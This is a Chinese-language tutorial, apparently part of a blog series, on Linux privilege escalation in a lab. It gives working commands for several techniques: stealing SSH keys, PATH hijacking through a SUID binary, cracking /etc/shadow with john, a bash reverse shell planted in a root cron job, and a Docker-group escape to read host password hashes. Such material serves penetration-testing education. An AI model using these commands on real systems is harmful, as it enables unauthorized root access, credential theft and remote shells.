Linux 提权( 三 )


尝试是否能够查看用户目录下的 id_rsad 文件
查看拥有 /bin/bash 的用户
cat /etc/passwd | grep bash
cd 到/home/web1/.ssh 下看看有没有远程登录文件
file
我们把 id_rsa 文件复制到本地赋权后使用ssh进行登录
chmod 600 id_rsa ssh -i id_rsa web1@192.168.150.156

Linux 提权

文章插图
 
环境劫持提权
环境劫持需要的两个条件
 
  • 存在带有suid的文件
  • suid文件存在系统命令
 
寻找suid文件
find / -perm -u=s -type f 2>/dev/null
Linux 提权

文章插图
 
分析文件 发现是一个查询进行的命令 所以里面应该是用ps命令
Linux 提权

文章插图
 
这个二进制文件运行许的时候一定是调用了ps命令,在/tmp命令下 创建ps文件 里面使用 /bin/bash执
行命令
Linux 提权

文章插图
 
把tmp的路径添加到当前环境路径,再访问 /script目录 执行shell文件,允许的时候首先会采用/tmp目
录的ps文件作为命令
所以可以劫持root权限进行命令执行
chmod 777 ps echo $PATH export PATH=/tmp:$PATH cd /script ./shell
Linux 提权

文章插图
 
john破解shadow root密文登录提权利用条件
  • /etc/shadow 文件可读
利用 
cat /etc/shadow 打印内容复制到一个文件中
使用john进行破解
john会自动检测密文类型 --wordlist 密码字段文件
john --wordlist="/usr/share/wordlists/rockyou.txt" passwd.txt
Linux 提权

文章插图
 
这个工具有的时候能够破解出来,有的时候不行 。
我们可以利用破解出来的密码进行登录,以获取一个更高的权限 。
Ubuntu计划任务反弹shell提权
当获取一个linux普通用户的时,查看计划任务
cat /etc/crontab
Linux 提权

文章插图
 
尝试修改 test.sh 文件为 反弹shell
bash -i >& /dev/tcp/192.168.150.145/7777 0>&1
在kali 上再开一个nc监听
nc -lvnp 7777
Linux 提权

文章插图
 
成功获取一个root权限
利用Docker 提权
docker是一个容器 可以在同一台机子虚拟多台服务 。
输入命令id 和group 查询当前用户信息和组信息 发现存在docker组
Linux 提权

文章插图
 
输入命令下载使用容器把容器的目录挂载到宿主的根目录
docker run -v /:/mnt -it alpine
访问宿主的/etc/shadow
cat /mnt/etc/shadow
Linux 提权

文章插图
 
sudo提权简介
sudo 是一种权限管理机制,管理员可以授权于一些普通用户去执行一些 root 执行的操作,而不需要知道 root 的密码 。
首先通过信息收集,查看是否存在sudo配置不当的可能 。如果存在,寻找低权限sudo用户的密码,进而提权 。


推荐阅读